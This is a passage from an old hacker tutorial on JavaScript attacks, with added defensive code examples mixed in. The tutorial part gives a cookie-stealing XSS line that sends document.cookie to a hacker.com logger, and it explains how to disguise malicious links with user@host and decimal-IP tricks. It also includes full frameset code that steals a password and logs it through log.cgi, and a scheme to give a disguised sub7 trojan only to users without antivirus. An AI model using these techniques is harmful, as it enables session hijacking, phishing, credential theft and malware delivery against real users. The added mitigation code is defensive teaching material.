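// %3Cscript%3E (or %253Cscript%253E) is seen as <script> and not as harmless letters.
function containsMarkup(rawValue) {
  let v = rawValue;
  for (let i = 0; i < 5; i++) {          // bounded: stop when decoding no longer changes anything
    let next;
    try {
      next = decodeURIComponent(v);
    } catch (e) {
      break;                              // malformed escape: judge what we have
    }
    if (next === v) break;
    v = next;
  }
  return /[<>]/.test(v);
}

// Set-Cookie value for a session cookie that document.cookie cannot read (HttpOnly), that is
// only sent over TLS (Secure) and is not attached to cross-site requests (SameSite).
function sessionCookieHeader(name, value) {
  if (!/^[\w-]+$/.test(name) || /[\s;,]/.test(value)) throw new Error('bad cookie name or value');
  return name + '=' + value + '; Path=/; HttpOnly; Secure; SameSite=Lax';
}

// Constructed sample: a quote-free payload in the shape the tutorial shows.
const SAMPLE_PAYLOAD =
  '<script>var u=String.fromCharCode(0x68);document.location.replace(u)</script>';

console.log(renderGreetingVulnerable(SAMPLE_PAYLOAD));
console.log(renderGreetingSafe(SAMPLE_PAYLOAD));
```

The vulnerable renderer returns the payload untouched, while the safe one returns it as &lt;script&gt;... text. The HttpOnly attribute is the mitigation that addresses the whole cookie-stealing section: even a successful injection then has nothing to append to the url, because the browser withholds the cookie from script.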
A few other problems with javascript and cookie stealing:
http://www.peacefire.org/security/hmattach/ - A hotmail exploit. Since hotmail didn't filter javascript and allowed .html attachments to be viewed and not downloaded.
http://www.securityspace.com/exploit/exploit_1b.html
http://www.peacefire.org/security/iecookies/ - Opening the cookie jar, remote cookie viewer. Using %2F instead of / makes ie think it's an intranet site.
http://homepages.paradise.net.nz/~glineham/cookiemonster.html
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms01-055.asp - Actually active scripting, not javascript.
Then there are the new about:// and file content reading vulns in ie that have been recently posted to bugtraq.. I plan on discussing these in detail when I update this tutorial.
Most people say to me, "but no one with any clue about security is going to click on the link which has javascript to steal cookies" and this is true when the plain url is http://site.com/vulnscript.cgi?document.location.replace('http://hacker.com/logger.php?' + document.cookie); That is why we need to trick them into thinking the url isn't dangerous. Here is one way:
obscuring urls:
One way of tricking a user into clicking a link they thought led somewhere else was to use that onmouseover trick to make the url look like it is pointing somewhere else. Obviously you cannot use this on protocols that do not support html or that completely block javascript and onmouseover. So instead of http://site.com you can have http://127.0.0.1; this might not help too much, so how about we use a little trick. When browsers login to .htaccess directories they can use the following syntax:
http://username:password@site.com
You'll see why this is important in a minute. Without the password you can have things like:
http://username@site.com
and it will work fine. It will try to login to site.com with the username = 'username' and no password. Now what happens if there is no .htaccess file? Then it doesn't matter what the username or password is, and the page loads normally. So something like this could be used:
http://microsoft.com/site/dir/helpdesk.asp@site.com
You see how this could be used to get people to click on a link thinking it leads somewhere else? Even if it is in plain text many people will believe this link goes to microsoft.com. Now that we have a link lets obscure it a bit =)
There are many different ways to obscure urls from users to help aid you in tricking them. One of them involves converting ip addresses into their decimal equivalents. I am not going to cover this, but there are plenty of other tutorials on the net where you can learn. I'll just let you use this script to automatically convert ip addresses to the decimal value.
IPa IPb IPc IPd = [interactive converter form]
Now use this instead of site.com and you get something like:
http://microsoft.com/site/dir/helpdesk.asp@3639550308%2F%61%2E%63%67%69%3F [insert nasty javascript url encoded here]
now that does not look like http://site.com/a.cgi? nasty javascript
which would be very clear for users to tell what it is doing. Lets go over the steps one more time, just to be sure you got it. First make up any site name (doesn't have to be a valid url)
http://aol.com/scripts/userid.jsp?
Add a @ to the end
http://aol.com/scripts/userid.jsp?@
Then the ip address of the host in decimal form
http://aol.com/scripts/userid.jsp?@3639550308
then the rest of the path in urlencoding.
http://microsoft.com/site/dir/helpdesk.asp@3639550308%2F%61%2E%63%67%69%3F
Also url encode the javascript and put it at the end. This is just one method of obscuring the url, there are others.
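The converter form the text refers to (IPa IPb IPc IPd =) did not survive in this copy, so here is an added example, not from the tutorial, that does the same conversion in both directions and then turns it around into a link inspector: given a url obscured with the user@host and decimal-ip tricks just described, it reports the real destination host and decoded path, which is what a mail filter or a careful reader wants to know. It reads the authority the permissive way the text assumes (everything before the last @ is credentials); function names are my own.

```javascript
// Added example, not from the original tutorial: the IP-to-decimal conversion the lost
// converter form performed, its inverse, and a link inspector that reports where a URL
// obscured with the user@host and decimal-IP tricks really points. Names are my own.

// Dotted quad -> single decimal number (127.0.0.1 -> 2130706433).
function ipToDecimal(ip) {
  const parts = ip.split('.').map(Number);
  const ok = parts.length === 4 && parts.every((p) => Number.isInteger(p) && p >= 0 && p <= 255);
  if (!ok) throw new Error('not a dotted-quad IPv4 address: ' + ip);
  return parts[0] * 16777216 + parts[1] * 65536 + parts[2] * 256 + parts[3];
}

// Decimal number -> dotted quad, so a human can read the real host.
function decimalToIp(n) {
  n = Number(n);
  if (!Number.isInteger(n) || n < 0 || n > 4294967295) throw new Error('out of IPv4 range: ' + n);
  return [n >>> 24, (n >>> 16) & 255, (n >>> 8) & 255, n & 255].join('.');
}

// Read a link the way the permissive browsers of the time did: everything before the LAST '@'
// is credentials and the real host follows it. The part after '@' is percent-decoded first so
// an encoded path (%2Fa.cgi) is recognised as a path, which is what the tutorial relies on.
function inspectLink(url) {
  const m = /^([a-z][a-z0-9+.-]*):\/\/(.*)$/i.exec(url);
  if (!m) return { valid: false, warnings: ['not an absolute URL'] };
  const rest = m[2];
  const at = rest.lastIndexOf('@');
  const userinfo = at >= 0 ? rest.slice(0, at) : '';
  const afterAt = at >= 0 ? rest.slice(at + 1) : rest;
  let decoded;
  try {
    decoded = decodeURIComponent(afterAt);
  } catch (e) {
    decoded = afterAt;                      // malformed escape: inspect as-is
  }
  const hostEnd = decoded.search(/[\/?#]/);
  const rawHost = hostEnd >= 0 ? decoded.slice(0, hostEnd) : decoded;
  const path = hostEnd >= 0 ? decoded.slice(hostEnd) : '/';
  const decimalHost = /^\d+$/.test(rawHost);
  const host = decimalHost ? decimalToIp(rawHost) : rawHost.toLowerCase();
  const warnings = [];
  if (userinfo) warnings.push('text before @ is credentials, not the destination: ' + userinfo);
  if (decimalHost) warnings.push('host written as a decimal IP: ' + rawHost + ' = ' + host);
  if (decoded !== afterAt) warnings.push('host/path were percent-encoded');
  if (/<script|document\.cookie|location\.replace/i.test(path)) warnings.push('path carries script');
  return { valid: true, scheme: m[1].toLowerCase(), host, userinfo, path, warnings };
}

// The obscured link from the text, with the "[insert nasty javascript]" part left out.
const OBSCURED_LINK = 'http://microsoft.com/site/dir/helpdesk.asp@3639550308%2F%61%2E%63%67%69%3F';

console.log(inspectLink(OBSCURED_LINK));
```

For the link from the text the inspector reports host 216.239.33.100 (the decimal 3639550308 decoded), path /a.cgi?, and flags the microsoft.com text as credentials. One caveat on the parsing model: browsers that follow the current URL standard end the authority at the first /, ? or #, so the helpdesk.asp@... form resolves to microsoft.com today and only the bare http://user@host form still carries userinfo; the inspector deliberately models the older, permissive reading the tutorial describes.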
6. Stealing forms
Ok, this method will not be used very often, and isn't too valuable a skill to the average hacker.. But it can come in very handy. This was originally a news post on my site, but it fits into this tutorial nicely. I know that this part might be very poorly explained and many people won't understand how it works. But I have tried to at least make it so people with advanced javascript knowledge can make some sense of how the attack works. Also note that this attack is purely theory, I have not used this against an actual site yet. It might even be used against sites which require you to fill in a form to login, this means hotmail, yahoo, and 100,000,000 other sites, but it would require extra coding, some of which I am not sure is possible.
Ok, in this article I will explain how to steal info from users by using javascript.
What this exploit requires is: A script that prints info you want into an input field.
The script doesn't check the referrer.
The most used reason for this would be to get usernames and passwords from sites. An example of this would be cyberarmy.com which was vulnerable to this for a long time. You will notice that if we did have the user's cookie we could have simply viewed this page and gotten their password, but cyberarmy was pretty secure in not printing unescaped data to the user's browser.
Now we will be doing this:
1 main page with 2 frames.
frame #1 - will look like a normal page and will steal the info from frame #2.
frame #2 - will load the page in a hidden frame.
this is what the main page will look like:
-------- begin --------
<html>
<script language="JavaScript"><!--
document.write('<frameset cols="10%,*" frameborder="yes" framespacing="0" border="3">');
//for the example we are using cols="10%,*" but in a real life attack you would use cols="0px,*" or
//something, so as to hide the frame that is stealing the form value.
document.write('<frame src="fuckca.html" scrolling="no" noresize name=blah>');
document.write('<frame src="userconfig.html" scrolling="auto" noresize name=vulnscript>');
document.write('<\/frameset>');
//You might be wondering why I used javascript to print the <frameset>. This was done so we
//can print more javascript on the page (the javascript that steals the form value).
printhtml(0);
function printhtml(counter){
  if (counter == 0) {
    //first pass: schedule a second pass 11 seconds later, after the frame has loaded
    var the_timeout = setTimeout("printhtml(1);",11000);
    counter++;
  }
  //grab the framed page's markup and rewrite it, splicing in a script that loads the real page
  var thehtml = window.vulnscript.document.all.tags('HTML')[0].innerHTML;
  window.vulnscript.document.open("text/html");
  window.vulnscript.document.writeln(thehtml.substring(0,thehtml.indexOf('RAID<//>')+8));
  window.vulnscript.document.writeln('--><script language="javascript">');
  window.vulnscript.document.writeln('location.replace("http://www.cyberarmy.com/zebulun/userconfig.pl");');
  window.vulnscript.document.writeln('<\/script><!--');
  window.vulnscript.document.writeln(thehtml.substring(thehtml.indexOf('<TABLE border=0 cellPadding=0 cellSpacing=3 width=90%>')-1, thehtml.indexOf('</html>')+7));
  window.vulnscript.document.close();
}
//-->
</script>
</html>
-------- end --------
of course in real use the size of the cols would be set so frame #2 (vulnscript) would be 0%.. So that the user wouldn't even know what is happening.
Now this is what the fuckca.html is:
-------- begin --------
<html><body>
<script type="text/javascript">
<!--
var name1 = parent.vulnscript.document.forms[0].pass1.value;
parent.blah.document.write(name1);
//-->
</script>
</body></html>
-------- end --------
all this does is print out the value of the first (unnamed) form from the frame named vulnscript (the one that has the page where we want to steal data from).
This is what their userconfig.pl displayed that we were grabbing:
Password : <INPUT TYPE="password" SIZE=45 NAME="pass1" MAXLENGTH=16 value="testpass">
The problem is that it would display the password in plain text (value="testpass" - testpass is the password); why it did this I don't know, stupid programming I guess. But if you got a hold of someone's cookie you could view that script and it would give you the pass.. So what this little trick with frames and javascript does is make users visit the page without knowing and then lets our javascript grab their password. Instead of printing the password to frame #1 (name=blah) we could have sent an invisible frame to a script which logs input. Example:
instead of
parent.blah.document.write(name1);
have
parent.vulnscript.location.replace('log.cgi?' + name1);
I would then tell a few people who I want passwords from about this page, say "hey, want to see a picture of my girlfriend?" (All hackX0r guys like pics of girls) then I would just put up some stupid pic.. Maybe Britney Spears or something. The log.cgi would log both name1 (their password) and $ENV{'REMOTE_ADDR'} (their ip address). This would let me match up usernames to passwords fairly easily. You could also get their username from grabbing it off the page, or from the contents of the cookie.
This attack is fairly complicated, so I didn't explain why I did a few things. I figure anyone who could actually pull this off would understand why. Also not many sites are vuln to this, and even for the ones that are, usually the attacker does not have the ability to hop on the irc channel and trick people into viewing it.
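The two things that made this attack possible were the site writing the stored password into the HTML (value="testpass") and the page being loadable inside somebody else's frameset. As an added example, not code from the tutorial or from cyberarmy, here is how a server would render that profile form today: the password field is always sent empty, the username is entity-encoded, and the response carries headers that refuse framing. The sample account and all function names are my own.

```javascript
// Added example, not from the original tutorial: what the site in the story should have done.
// The password is never written into the HTML, and the response refuses to be framed, which
// removes both halves of the attack described above. Function names and the sample account
// are my own; the form mirrors the userconfig.pl output quoted in the text.

// Minimal entity encoding for the one value this page does echo (the username).
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Render the profile form with an empty password field. The stored secret is never sent to
// the client, so there is nothing for a script in another frame (or a stolen cookie) to read.
function renderUserConfig(account) {
  return [
    '<form method="post" action="/userconfig">',
    'Username : <input type="text" name="user" value="' + escapeHtml(account.username) + '">',
    'Password : <input type="password" name="pass1" maxlength="16" value="" ' +
      'autocomplete="new-password"> (leave empty to keep your current password)',
    '<input type="submit" value="Save">',
    '</form>',
  ].join('\n');
}

// Headers that stop another origin from loading this page in a frame at all:
// X-Frame-Options for older browsers, Content-Security-Policy frame-ancestors for current ones.
function userConfigResponse(account) {
  return {
    status: 200,
    headers: {
      'Content-Type': 'text/html; charset=utf-8',
      'X-Frame-Options': 'DENY',
      'Content-Security-Policy': "frame-ancestors 'none'",
      'Cache-Control': 'no-store',
    },
    body: renderUserConfig(account),
  };
}

// Constructed sample account; the password is the server-side secret that must not leak.
const SAMPLE_ACCOUNT = { username: 'b0iler', password: 'testpass' };

console.log(userConfigResponse(SAMPLE_ACCOUNT).body);
```

The same-origin policy is also worth naming here, since it is the reason the author could only test against a local copy (userconfig.html): parent.vulnscript.document is readable from fuckca.html only while the frame holds a page from the same host, and the moment location.replace() loads cyberarmy.com into it the browser denies that access. The headers above are the belt to that policy's braces: they stop the page from being framed by a foreign document in the first place.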
7. Gaining Info On Users
Ok, this is probably the least likely technique in this tutorial to be used. All the rest can be used fairly often. This one is used to gain enough info on someone in order to form a trojan attack on them. What this javascript will allow us to do is to probe their system and see if they have any security against our attack. It will let us see what anti-virus program they use, what firewall they use, and if they have any programs that allow us to infect them with macros.
This was originally a bugtraq post ( http://www.securityfocus.com/archive/1/224673 ) with a link to the example at http://geocities.com/dzzie/sys_snoop1.html but we are going to probe for more security related programs. (put a probe for anti-virus programs, firewalls, word, adobe acrobat [pdf])
Lets say we check for anti-virus programs, if they don't have any you can display a link to download sub7 and say it is a video game... if they do have an anti-virus program you can display the link to the real game. This way you don't have to worry about the user finding out that you tried to send them a trojan. Only users who don't have an anti-virus program will have downloaded the trojan.
One possible future for trojans is modules that you can insert to attack specific programs. For instance if you know the user is running a certain type of anti-virus program and they are running a certain type of firewall you can plug those modules into the trojan. When the user downloads and runs this trojan the modules will trojan those anti-virus and firewall programs making them seem as if they are running fine, when they aren't. Either they won't detect your trojan or they will replace them with an empty program that just puts the icons in the taskbar and task list. I will try to get a working demonstration of how javascript can be used to download the correct trojan for a user's system or detect if the trojan will be detected by an anti-virus program so it will make them download a regular file.
If you have a firewall or anti-virus program please send me the full address (absolute address) to all the images it has. email the list to b0iler@hotmail.com What the javascript will do is try and load that image, if it does then ie will return a true value, if it doesn't ie will return false and we will know the user does not have that software installed. When I get enough info on the main anti-virus and main firewalls I will put together the code and explain it better.
This section isn't really done, but I am getting sick of writing so I guess I'll have to finish it later. All I am going to do is add a demo of how to check for anti-virus programs.
8. Stories Of Javascript Hacks
I have decided to add a section here of a few interesting javascript hacks I have heard about and seen. Since normal web site defacements and such are full of script kiddies who just ./own site.com with no creativity or thought, I like to hear a nice story of hackers coming up with cool ways to manipulate systems and people.
First story is about a webgame called redlite (taken from a tutorial I wrote a few weeks ago)
What happened was that a friend of mine found his first exploit and with the help of someone else coding it - got it to work really good. Before I continue with the story you'll need to know a little bit about the situation.
In #b0g on us.undernet.org, a place where I hang out sometimes, there are a lot of people into this online game called redlite. The object of the game is to fight people in an online version of a drug war. You have crack, hoes, guns, money, and the like. Now a few days prior to this I was about to sign up for it just to see what all the fuss was about; as I was signing up I saw that the registration script prints what is inputted to it. The script also didn't filter anything but ' and " from the input, so it could be used to steal cookies from users. I coded up the exploit and tested it... everything worked fine. But I never found out if you can do anything with just a user's cookie. And I didn't really care about the game, so the exploit never really got used. When I went back into #b0g haze and tak, two redlite players and b0g gimps, had found another script that prints something to a page.
The page that it prints to is their player
